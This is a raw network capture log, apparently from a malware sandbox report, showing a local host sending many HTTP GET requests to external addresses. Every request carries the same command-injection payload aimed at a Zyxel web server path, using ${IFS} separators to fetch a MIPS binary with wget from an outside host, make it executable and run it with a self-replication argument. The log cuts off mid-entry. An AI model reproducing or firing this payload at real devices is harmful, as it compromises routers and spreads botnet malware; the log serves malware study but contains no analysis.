                                            Feb 2, 2024 06:21:01.414177895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1494192.168.2.1540342189.251.235.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414238930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1495192.168.2.155826692.113.76.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414256096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1496192.168.2.153923094.82.254.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414293051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1497192.168.2.154072088.169.28.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414329052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1498192.168.2.1551608147.181.190.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414347887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1499192.168.2.153950882.154.235.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414381027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1500192.168.2.154233874.237.115.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414424896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1501192.168.2.1547168119.10.179.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414469957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1502192.168.2.153536687.95.152.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414518118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1503192.168.2.155160819.240.184.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414539099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1504192.168.2.1538806183.151.61.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414581060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1505192.168.2.1547380210.236.24.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414628029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1506192.168.2.1532834117.103.161.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414658070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1507192.168.2.153770431.39.167.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414704084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1508192.168.2.154528649.247.202.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414732933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1509192.168.2.155969049.111.26.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414772034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1510192.168.2.155601876.116.31.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414800882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1511192.168.2.1543596223.53.3.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414825916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1512192.168.2.1547868128.147.145.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414880037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1513192.168.2.1546134123.27.76.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414920092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1514192.168.2.1542824111.224.78.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414943933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1515192.168.2.155673095.62.161.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414975882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1516192.168.2.1537974181.228.252.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415030956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1517192.168.2.1549290201.163.19.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415045023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1518192.168.2.1534496212.99.105.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415066004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1519192.168.2.1558668189.83.144.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415096045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1520192.168.2.1550588165.24.140.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415148973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1521192.168.2.154170075.60.47.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415170908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1522192.168.2.1557650108.118.136.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415220022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1523192.168.2.1540516172.121.70.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415245056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1524192.168.2.154532259.208.173.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415278912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1525192.168.2.1538364139.35.69.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415329933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1526192.168.2.1551910120.48.251.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415370941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1527192.168.2.1547626156.78.64.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415391922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1528192.168.2.1553948222.142.86.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415452003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1529192.168.2.154495882.167.51.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415482044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1530192.168.2.1544064218.198.41.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415519953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1531192.168.2.1549962176.6.187.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415545940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1532192.168.2.156034641.67.208.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415600061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1533192.168.2.1558784218.16.101.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415621042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1534192.168.2.1553618164.124.106.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415678024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1535192.168.2.1548328213.152.96.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415707111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1536192.168.2.153675619.99.124.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415762901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1537192.168.2.1546638165.110.196.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415810108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1538192.168.2.154207823.250.200.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415829897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1539192.168.2.1560442208.238.195.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415868044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1540192.168.2.1536080176.113.28.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415913105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1541192.168.2.154602266.133.87.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415952921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1542192.168.2.1540852115.10.246.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.415983915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1543192.168.2.1532920105.24.129.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416023970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1544192.168.2.155722685.49.243.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416054010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1545192.168.2.1553528113.174.142.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416083097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1546192.168.2.1542502213.224.111.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416110992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1547192.168.2.154547619.61.130.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416146040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1548192.168.2.1550260220.199.24.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416202068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1549192.168.2.1557394157.217.18.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416248083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1550192.168.2.1559628180.49.189.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416296005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1551192.168.2.1552974128.200.194.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416327000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1552192.168.2.1535304166.132.197.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416373014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1553192.168.2.1560784199.229.218.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416414976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1554192.168.2.1550136217.151.189.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416438103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1555192.168.2.1540762128.176.39.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416486025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1556192.168.2.1541200129.225.145.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416507959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1557192.168.2.1556986221.29.89.26443
                                            TimestampBytes transferredDirectionData
